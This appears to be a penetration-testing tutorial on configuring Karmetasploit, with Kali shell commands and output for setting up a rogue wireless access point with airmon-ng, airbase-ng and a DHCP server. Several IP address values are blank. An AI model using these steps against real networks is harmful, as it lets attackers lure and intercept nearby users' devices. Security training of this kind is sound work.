Karmetasploit Configuration

There is a bit of setup required to get Karmetasploit up and going. The first step is to obtain the run control file for Karmetasploit:

root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
--2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
Resolving www.offensive-security.com (www.offensive-security.com)...
Connecting to www.offensive-security.com (www.offensive-security.com)||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1089 (1.1K) [text/plain]

Saving to: `karma.rc' 100%[======================================>] 1,089 --.-K/s in 0s

2015-04-03 16:17:28 (35.9 MB/s) - `karma.rc' saved [1089/1089]

Having obtained that requirement, we need to set up a bit of the infrastructure that will be required. When clients attach to the fake AP we run, they will be expecting to be assigned an IP address. As such, we need to put a DHCP server in place. Let’s configure our ‘dhcpd.conf’ file.

root@kali:~# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;


log-facility local7;

subnet netmask {
  option routers;
  option domain-name-servers;

Then we need to install a couple of requirements.

root@kali:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions.  This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...

Now we are ready to go. First off, we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network.

root@kali:~# airmon-ng

Interface    Chipset        Driver

wifi0        Atheros        madwifi-ng
ath0         Atheros        madwifi-ng VAP (parent: wifi0)

root@kali:~# airmon-ng stop ath0

Interface    Chipset        Driver

wifi0        Atheros        madwifi-ng
ath0         Atheros        madwifi-ng VAP (parent: wifi0) (VAP destroyed)

root@kali:~# airmon-ng start wifi0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
5636    NetworkManager
5641    wpa_supplicant
5748    dhclient3

Interface    Chipset        Driver

wifi0        Atheros        madwifi-ngError for wireless request "Set Frequency" (8B04) :
    SET failed on device ath0 ; No such device.
ath0: ERROR while getting interface flags: No such device

ath1         Atheros        madwifi-ng VAP (parent: wifi0)

root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25  Created tap interface at0
22:52:25  Trying to set MTU on at0 to 1500
22:52:25  Trying to set MTU on ath1 to 1800
22:52:25  Access Point with BSSID 00:1A:4D:49:0B:26 started.

Airbase-ng has created a new interface for us, at0. This is the interface we will now utilize. We will now assign ourselves an IP address and start up our DHCP server listening on our new interface.

root@kali:~# ifconfig at0 up netmask
root@kali:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on   LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@kali:~# ps aux | grep dhcpd
dhcpd     6490  0.0  0.1   3812  1840 ?        Ss   22:55   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root      6493  0.0  0.0   3232   788 pts/0    S+   22:55   0:00 grep dhcpd